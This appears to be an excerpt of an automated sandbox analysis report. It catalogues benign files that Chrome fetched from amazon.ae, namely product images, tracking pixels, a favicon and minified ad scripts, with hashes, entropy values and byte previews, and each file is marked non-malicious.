                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 440x280, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):11753
                                                                                                                                                                                                                                                                      Entropy (8bit):7.923927182992249
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:1k9PIUXOD5zsRS/fa9h8mLp2/qWB0eR1KV76HF8cBGaWUdtCtyAtTAeKyDB:1k9ReD5zjcZZw1eiBGaWUdItzTAfg
                                                                                                                                                                                                                                                                      MD5:9F990697A77EA921EF1614F6B334E46F
                                                                                                                                                                                                                                                                      SHA1:FFCB75979E5C727BBEE45F4D9F292C243302DA9F
                                                                                                                                                                                                                                                                      SHA-256:0F9F728BB5F7B625C6D551080BEAD7A84C4EF9B53B89C382E9B7B2F2528C1CA1
                                                                                                                                                                                                                                                                      SHA-512:039D9DBCDFDED284046C9550CBA04AB6E3421A3B1E5705F0B0051A02B01C9901EB6D09A879286D26F3C540633B0E2B12BBC7508087D9453D6C948411EF318ADD
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/sports-outdoors/revamp2022/EN-L2-Price-U499-440x280.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#............."................................................@.................$.I...}...n........y.1, ..M......0k......X......Z.....{X.fP...R.....+.b....YY......l.....<....Uwf..b.Q......}f...D.m..{.......G|.....^Y...C..oKnY._ ....@....].....Z...N}......}l!..._ZA.-.(..s.0...P...szs.G.7%Y..W..BeJ.d_...w .B..[..Z..A.Nl.:B.....S0.Nc..&...{.>.....OM..Tu.T.&.Kso....D....T.......................{`W4.........".........../....?{,......G.5<..E......f..5.._...?......O.;..R..^GF.DG...._...^3...uQi.mSS...V.?N..[7.....T.y{........u....T..-e.wC()OC.r..g...j..-.7]V5.hI9....t....k.$........k...^.X.'.$Tu.X.};.....i.....E....].'....9mkK....-.]...&......VE....._ak..P.....5..e.g.5.Jz+..../..=U.j.w.N.....{..H(..+.6.....-*z....E..,.....;..mc..7y.W>...}..7.{...EGm[.>..s./........K..m.....|C....r;%..E!....M
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, progressive, precision 8, 1500x600, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):33268
                                                                                                                                                                                                                                                                      Entropy (8bit):7.74699063138377
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:4YyvCAlYCdmwKNDe2/DaBDbdKzTCnbUVF9X7G5Vyc:4UC0wKR0BDbETCnIF3c
                                                                                                                                                                                                                                                                      MD5:44C5ACA9865E4D7DAD0F9AD4082EA612
                                                                                                                                                                                                                                                                      SHA1:14A6302B362BB33CCA565548E5F3017B090202CF
                                                                                                                                                                                                                                                                      SHA-256:7D182376483481C1C0EF3A2235B10CCF49DCF2C58B5AA51EA7BB8677916B72E0
                                                                                                                                                                                                                                                                      SHA-512:F16A8C815319CC9491C23C6D18CED92A2295A5F276E570EAD35B7A4AB991DE5016AB510BF291EF36951B09D2D820F5AE27AA9DB980E64175F87047B77A845710
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):1494
                                                                                                                                                                                                                                                                      Entropy (8bit):7.491314812588649
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:24:TRe+0CmRoR1v2Do6fMDKPmQnrKi3Sa7HpRA4VhPUB676vlZWlx/pg4qu7+cSr+Ok:TT0rogo6fM+1rKiiiJ64VxUJvWjpg4nX
                                                                                                                                                                                                                                                                      MD5:5A672574F8EB20918FFBCAC3548DCB2E
                                                                                                                                                                                                                                                                      SHA1:0CE81554FD0520BF8966D31E3C358F7D964CA1E2
                                                                                                                                                                                                                                                                      SHA-256:7ABC64236E3A1539675B3E2E300FF8C360E50313D8995C7B4432B86B53F740E6
                                                                                                                                                                                                                                                                      SHA-512:5A4F1F94E77CAF0FD0D1580ACBE32C1692A1AC210F155BEADA502861475A0A6AAD0F75C8B1861AE338878939BCD9948ECA18B5B56342A16A802AE6BFE8F34B9A
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..............................................................!.1Q."2Aaq.....3r...#R...4................................................12............?..........................h...Qo.....1.h....s.w.........^kp.URuv.qMC<.M.q..X&...1]).K=...i2h..9;o)i[.[..U.b.....:.TUR.y@H........I..j.P..h.......w.IJO..8..Q.....r.87.Q.....Y6v...Fz./.Q.(..O.....\....D.......JR.n=.I...}...=6.75..#..Cj..,p.,vF.6..\..N.....:6...F.4..tw*u{.}$.t.YB..B.*t...X...._.M.....\-g.UN-oY.I...-.q.cN.oVpm.\.E..8..Ao}..c$.?......<..B....,h.,7...NO9......#......kR.;wXk..b.. ..If<...%@......^[m.....l.2......z.9[..q...S.6..f...ire.-];..Q......k...5.e..vH..e..L..._. .....2...V.(.P.5;J+.Y......QeuuV.j7..5.=.T..*m..8.x....ye....V..1N...9....\...$O+.k.N.8....:^....(..W..p....f..d..#%.SD..i8.3!y*\O.......T....GJ...u.n...I..l
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:261-8635865-4706955:RP6015S40NY7Z1AX6ZEM$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.295509.0%26id%3DRP6015S40NY7Z1AX6ZEM%26ctb%3D1%26sc0%3Dmulti-brand-creative-desktop_loom-desktop-brand-footer-slot_87%26bb0%3D2319%26be0%3D2326%26pc0%3D10648%26ld0%3D10648%26t0%3D1724264941834%26pty%3DSearch%26spty%3DList%26pti%3Dundefined%26tid%3DRP6015S40NY7Z1AX6ZEM%26aftb%3D1%26lob%3D1:10649
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 72x320, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):9244
                                                                                                                                                                                                                                                                      Entropy (8bit):7.955772271816896
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:8Z3w5dR60WNQJNRxEsWLHCXlXx6TsDXxotYDbAc+XxE3CAug:8ZYdR8NQX3ExDYlX8wDXxORxEnn
                                                                                                                                                                                                                                                                      MD5:40DB1A9C015799F2CFC480A72E9E493D
                                                                                                                                                                                                                                                                      SHA1:E02E343DE0E66DCD40A358CB17574BF1CB71D55A
                                                                                                                                                                                                                                                                      SHA-256:5282CA2B77E8BCF08910BAB0F718F1EC2623075A236119DEB250747ACD57D3B2
                                                                                                                                                                                                                                                                      SHA-512:7772DAEFFFD8A6314D699F570060DC2F7D63774600BD5EDC0BD7F883E17783A96449FD3CB3CAA5876767338129237C88A1309AC03B3633C2770CC31B3D769C13
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/61DIIbzY-2L._AC_UL320_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@.H..".................................................................!1"..2AQq.#5Bst.4Rar.....$3CSTbd.........%u....Dc.................................................!1..AQq.."23.ar.......#4B.b...............?..UULt.K<.jF.....$..7.,...$.[R.33.J.QSw.b......<..|....5QH..................N.....@.W.g._;.?..BN;...|....U0..~.T...Y.He...L....$...]QX...............8O=....6.....m|....P<LQ.......O.L.<...t..Z.......g._:.......u..S.RV...28..t..9FVr.u..B..`o...j6..V?.uE.QEY.t........fW....t.........F.-F..}........T./...........$....dU.+......?..|.....i _.Y.?....s.....c<.F.=....z....P+i.......q..~,.=...+b....sGMS...C...i'9./.$........j~Z..#w&E'..'].h...O.m.0P..j....."......c.q.0Zh.h...YT@+.'.I.FCO/A3. O.#......T.."%c.{....Q.D.....q.^...Z..|.J.>9..>{..,....[.g.-...^....k..T^..{....5..7.5g'.Z3.z...<N4....*.<
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (30900)
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):30946
                                                                                                                                                                                                                                                                      Entropy (8bit):5.2642111425198035
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:HXhQ+LMasRxYQxky/diedmkDsdJS4Ok0o0MRbjigQeUpteUHiyYNDbDUkBGP95xP:RQms7Hx9F4Ok2rKGPZ
                                                                                                                                                                                                                                                                      MD5:976E8467CE0507E7C353E8CDF51A47AE
                                                                                                                                                                                                                                                                      SHA1:0F3586B696BD6D72B4F479F0006E6646FF8FA065
                                                                                                                                                                                                                                                                      SHA-256:F568DF0B01BA2FD16758F3E126AF7F88E041DA72D13197BCCF925224BF09A98A
                                                                                                                                                                                                                                                                      SHA-512:C7D61A9E9ACB19C220AD429CABEAE9F7570F160BB4D4270E177A996961070417376535BEB75F05A49CE64C225B9A539AD25A526BF4CBA70836052CE994DFB1E7
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/S/apesafeframe/ape/sf/desktop/sf-1.50.af25278b.js
                                                                                                                                                                                                                                                                      Preview:(()=>{const e="sfImpression",t="LightAdImpression",i="viewablelatency",a=(e,t,i)=>({csaKey:e,csmKey:t,csmMessage:i}),s=(a("bodyBegin","bb",e),a("bodyBegin","bb",t),a("bodyEnd","be")),r=(a("clickToATF","af"),a("criticalFeature","cf")),n=(a("criticalFeature","cf",e),a("criticalFeature","cf",t),a("loaded","ld")),o=a("loaded","ld",e),l=(a("loaded","ld",t),a("viewablelatency:bodyBegin","bb",i),a("viewablelatency:loaded","ld",i),(e,t)=>{console.error(e,t)}),d=e=>{e.sendLatencyMetric(n),e.sendLatencyMetric(r)},c=e=>"V"===e,h={1027:"Sponsored Display DRA"},m={1:"Enabled",0:"NotEnabled","-1":"Unknown"},u=e=>v(e),v=e=>decodeURIComponent(escape(atob(e))),p=e=>e&&0===Object.keys(e).length&&e.constructor===Object;let g=null,w=null,b=null,f=null,y=null;const M=new class{viewabilityStandards(){return f=f||[],f}payload(){return b=b||{},b}},x={ext:{inViewPercentage:()=>(g=g||0,Math.round(100*g)),geom:()=>(w=w||{},w)}},C={playingTime:()=>(y=y||0,y)},E=()=>M,P=()=>C,T=e=>{var t,i,a,s;g=void 0!==(null==e|
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:261-8635865-4706955:APAVCQJMFK78QJEV1PMZ$uedata=s:%2Frd%2Fuedata%3Fstaticb%26id%3DAPAVCQJMFK78QJEV1PMZ:0
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 280x320, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):21701
                                                                                                                                                                                                                                                                      Entropy (8bit):7.959302559074462
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:9UyLITBA9hF3QmrPBYv/QUHdVcwquQDBNZh8l5leBP68CPdh35b4u:VLMBg3QBHQ8dyuQNNZClCBy8G4u
                                                                                                                                                                                                                                                                      MD5:03EF4BB818233CDF1ED9A66759CD24D8
                                                                                                                                                                                                                                                                      SHA1:15CDCFC6B18495A74F799B2A245B87E59BDF6AC3
                                                                                                                                                                                                                                                                      SHA-256:7FCD82F943DA99D46EB94E3B14737295C2C24B9AC688B7C4BD99F50B500FD8A4
                                                                                                                                                                                                                                                                      SHA-512:DC668A9B06014B087B0677AF743738CFA94BBA2CE2C3CF0F04442BAC692249E6028696598D0C6B2B3ECC0B02E5D1511265441B8EDEDC979336D91712CD8F517F
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."........../...................................................................p..Y..R.....wM..al.}...S.B3...6fK.Y..v..u..F..@........k......*..Rf...P.9.*cr..;q^4....CIt.HA..X....u...NJ........S_.d.%....%....[.*..=f.c.rc.e...k...4A\..z.\d..N.Y.u.d@....y..5G....m.#..K....L.7d.x...8cn.......D&..Oi...........8........A.:.4B.dmDRSm.l......<.....-..p.4.~....$._&.0Jd[..L.XVY.... ...(5..........m.<....R.B,J.u...,.....#......Lx.k.[...fB:6b..p.....1...>.........M.../<f9..^.......w....?eG#H....%...Za.`.D......}<a..{.7.....D)....Vy.......'....<..w...F.......xu... hd.$.!I.e..^(n.n..V.c.$.}..yP......g....jC...l.....T.L..i..s.........x..Y....M.[..W.........`}..."...%. ....3......./I.\.|..,...E.ke....U.1.,......V..;......z...9.C.../........."....[..N.6.i.V..=K4R.i..8.....>p........Xs.<W..L .Sd.Mi..F.t...
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (607)
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):10158
                                                                                                                                                                                                                                                                      Entropy (8bit):5.1802871493858484
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:WiF4QtoZmosQwyi3aOxDxpL6shV/icawy8P+KexjLIvwEgveEHvuEfunuyUIK8AB:pto0oiPpL6shFiP8PX9I/PvV2yZ
                                                                                                                                                                                                                                                                      MD5:07A45F05EF21AE19E99F4B71039C95CD
                                                                                                                                                                                                                                                                      SHA1:D3B7399B84358638740DC746EE34FF8236B8E06C
                                                                                                                                                                                                                                                                      SHA-256:DD16175D6A1472CEA68FC92923A98B80C7CBD809877CDFDD1091200FE3118C84
                                                                                                                                                                                                                                                                      SHA-512:82FD00D8484B8365138B95D59413F916029B146059373013EFB5E9760FA5570D7F915A072D8F16563E6C81379DC0B7EA619D7C373CC4F77D1B8387D93282ED28
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:(function(g){var e=window.AmazonUIPageJS||window.P,w=e._namespace||e.attributeErrors,p=w?w("AmazonGatewayHerotatorJS",""):e;p.guardFatal?p.guardFatal(g)(p,window):p.execute(function(){g(p,window)})})(function(g,e,w){g.when("generic-observable").register("gw-herotator-controller",function(g){var f=function(){};return function(e){function y(){h.notifyObservers("delayBegin")}function z(){h.notifyObservers("delayInterrupted")}function w(b){for(var c=0;c<l.length;c++)if(l[c]===b)return c+1}function k(a){a=.a||{};return{delay_complete:a.delay_complete||f,js_ready:a.js_ready||f,fg_loaded:a.fg_loaded||f,mouse_move:a.mouse_move||f,mouse_leave:a.mouse_leave||f,delay_interrupted_timeout:a.delay_interrupted_timeout||f,rotation_complete:a.rotation_complete||f,goto_card:function(a){a!==n&&b.user_navigation(l[a-1])},user_navigation:a.user_navigation||function(a){b=new D(a)},user_interaction:a.user_interaction||function(){b.user_navigation(l[n-1])},stop_autorotation:a.stop_autorotation||function(){b.u
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 302x320, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):28989
                                                                                                                                                                                                                                                                      Entropy (8bit):7.981294849225469
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:z9qTOjdq8YRl1JB1bTFa/YOGz6mMOWYESOdxAPFz:JvUTD1Y/YvFEoP5
                                                                                                                                                                                                                                                                      MD5:6C1E3034587C88596DB30CEEE25F7BEB
                                                                                                                                                                                                                                                                      SHA1:C4EE187EFFAB6B89B9BB7109A28804F3CD8E69E4
                                                                                                                                                                                                                                                                      SHA-256:7EF4E0131A0E83A2F54AC080C38B998B140A0C8275EAFFAA28304932E76C3EA4
                                                                                                                                                                                                                                                                      SHA-512:DA9D39A40E0A4F7B701DE6A85B1C6F1DDC87EA1BDED830603348B3E2CECFB05ADB0B2136029D00B9150F96A4337A6349C3B5BF4CED5665E1ECFE7BEAF70E02BD
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."..........5..................................................................i I I I I I I I I M...u...5.!.$.$.$.$.$./.A....R..x...N..a.....b..=.qs.R>....i.:r....~../.6}{...........r.7.U..y.c-.gc.-^.pH...........t.......j-.....+.l...S.........<.O...MFo..k....az....Z.}aq.E....&...].R=...Po.-.._..jY;.....$D!..)..2a..s...P..`!.m...b........[...U...V..q?..mn9.......=..*I.KSK..W..._~{.>..z.).k..s.o.....E!......$K..W`H...H.r........+../.[,.c.../.$.!.H..K.o.x.....V....ijSd........<[..>C.. %...s..0a.X..vwiKM..u.-JI.I.I.6!g...H..7..$.f=.d[[....4z..2Qh...}|.)....".XU.M.<.......>VVh..z.G.......9Y..{.....iy...Z...d......Pa.Pa.)....9.[...p.......M.0........a.....Y.$.Y.....|.(.=.^..D.D%#=...].....G.a./...cc~..@.@.A\..._./#.9aNZ..}...W.RF.....q:.*.YHm.m.5.q.do....pT..W.s..Kg[..PexLB..2>...y.....\-..1)...
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x320, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):13902
                                                                                                                                                                                                                                                                      Entropy (8bit):7.970316524541187
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:UlOnRM4heoAAgSEB7UhE+cw4Ngmcij/T+iYObkP/akvSFb2rBE7Lm116J3Y5LOK:Vq4xgx7ceTncRxOIXaZnOYJI5LOK
                                                                                                                                                                                                                                                                      MD5:A99A000575E64DF857E066B453341F09
                                                                                                                                                                                                                                                                      SHA1:B6AB15C6BFAA34A781DC92A36533514303E9C565
                                                                                                                                                                                                                                                                      SHA-256:FB5425F52617B8191B2EEFA7E287F46F8E2240D16BD3486489DC3BF6CF23158A
                                                                                                                                                                                                                                                                      SHA-512:F7C3BB2FCD0BA423F664E3F18B34F4E47B4C5CCAA9998428B7EDEDB2733B8F278F00ADF39F708FC75A06EE7DE7C9A25CFA16C0B9C69740990602717A44EDB49D
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."...............................................................!..1."A2QRa.....Bqu..#56t....3CSbr...$4Tc......U.................................................1....!Q..2AR3aq."..B..............?..t(P....(.B.$.....F....j...?...c+...8....h.;.......+.3..k[HG.I;{..*..r./.`..)]v.....H.Im.......q]..O......r....O..y....../=...........d..5.t..q...Lb....)..FS.n&..].f.L....o.....l|]m..ZF..QI...?(^-......e..:.....[#.`.Xg.s.O..2.}p..}......`._8.U...k..e.[.[.db.......7......S...@t......B..(P.@..(P.......i-..x......8.....U.a..........w.`....7.Zxz...Z..Q~!.g..e......h_>..!.Q...".[M7Dh...gP.....R....d~.S..(...u..b...jkfn.J}.........O{(..{W..5....!....4.$ x...;...F......Y..I...<p...a..h=)G.....x....VK-....i...e.g.{..V...............+...>.......J.9bxw...$."G'...}...p.I. .$s..].b....z%.G.....j.(P....
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:MS Windows icon resource - 4 icons, 48x48, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):17542
                                                                                                                                                                                                                                                                      Entropy (8bit):2.247918084411713
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:9dLhJ6/f2dh+xQLeZ10TLwhwOHae6nmErcglsIZS3F:3jaOdhQQu0TLwaOHEr6IZ
                                                                                                                                                                                                                                                                      MD5:CA6619B86C2F6E6068B69BA3AADDB7E4
                                                                                                                                                                                                                                                                      SHA1:C44A1BB9D14385334EB851FBB0AFB19D961C1EE7
                                                                                                                                                                                                                                                                      SHA-256:17D02E2DB6DBEDB95DD449D06868C147AC2C3B5371497BCB9407E75336A99E09
                                                                                                                                                                                                                                                                      SHA-512:30F8F8618BFBCD57925411E6860A10B6AD9A60F2A6B08D35C870EA3F4CEC4692596A937FF1457CEFF5847D5DA2B86CEBA0200706625E28C56A2455E6A8C121D3
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://www.amazon.ae/favicon.ico
                                                                                                                                                                                                                                                                      Preview:......00.... ..%..F... .... ......%........ ......6........ .h....@..(...0...`..... ......%.........................................E...................................................................................................................................................?...................................$...........................................................................................................................................................................................B............................................................................r...P..........................................................................................9...............-........................................................r...................................................>......................................................................$..............................................................................................................................
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:261-8635865-4706955:3YMHCN1ADEMYQEW81YBE$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.295396.0%26id%3D3YMHCN1ADEMYQEW81YBE%26sc0%3Daui%3Asw%3Appft%3Acallback_ricb%26bb0%3D114%26pc0%3D1006%26ld0%3D1006%26t0%3D1724264955042%26sc1%3Dportal-bb%26pc1%3D4%26ld1%3D4%26t1%3D1724264954719%26sc2%3Daui%3Asw%3Apage_proxy%3Arequest_feature_tags%26bb2%3D1007%26pc2%3D5061%26ld2%3D5061%26t2%3D1724264959097%26sc3%3DcsmCELLSframework%26bb3%3D1203%26pc3%3D1203%26ld3%3D1203%26t3%3D1724264955239%26sc4%3DcsmCELLSpdm%26bb4%3D1203%26pc4%3D1218%26ld4%3D1218%26t4%3D1724264955254%26sc5%3DcsmCELLSvpm%26bb5%3D1218%26pc5%3D1219%26ld5%3D1219%26t5%3D1724264955255%26sc6%3DcsmCELLSfem%26bb6%3D1219%26pc6%3D1219%26ld6%3D1219%26t6%3D1724264955255%26sc7%3Due_sushi_v1%26bb7%3D1219%26pc7%3D1220%26ld7%3D1220%26t7%3D1724264955256%26ctb%3D1:5257
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):23
                                                                                                                                                                                                                                                                      Entropy (8bit):4.175735869100492
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:VXciJ:hD
                                                                                                                                                                                                                                                                      MD5:C7D3355DDAC8D35912F6CB56C4BE6ECA
                                                                                                                                                                                                                                                                      SHA1:4ECB85CA8A4B633FE7DB11B2B7591AF83A89D406
                                                                                                                                                                                                                                                                      SHA-256:88EA58255D4CD82340F7ACAABE0E6A99F195A4DC2CA6EF56EC503D03B331BEE5
                                                                                                                                                                                                                                                                      SHA-512:8164D943F11F6559A8AB31869676FD4801E6E8C18DF05B53EF2F5CE5EC23BD632E66018EC134DA658289B6FA4C2BA15EF47DCF6210866457CFA7DEDB45994272
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/G/01/csm/showads.v2.js?category=ad&adstype=-ad-column-&ad_size=-housead-
                                                                                                                                                                                                                                                                      Preview:window.ue_adb_chk = 1;.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (10372)
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):10450
                                                                                                                                                                                                                                                                      Entropy (8bit):5.228070049895735
                                                                                                                                                                                                                                                                      Encrypted:false
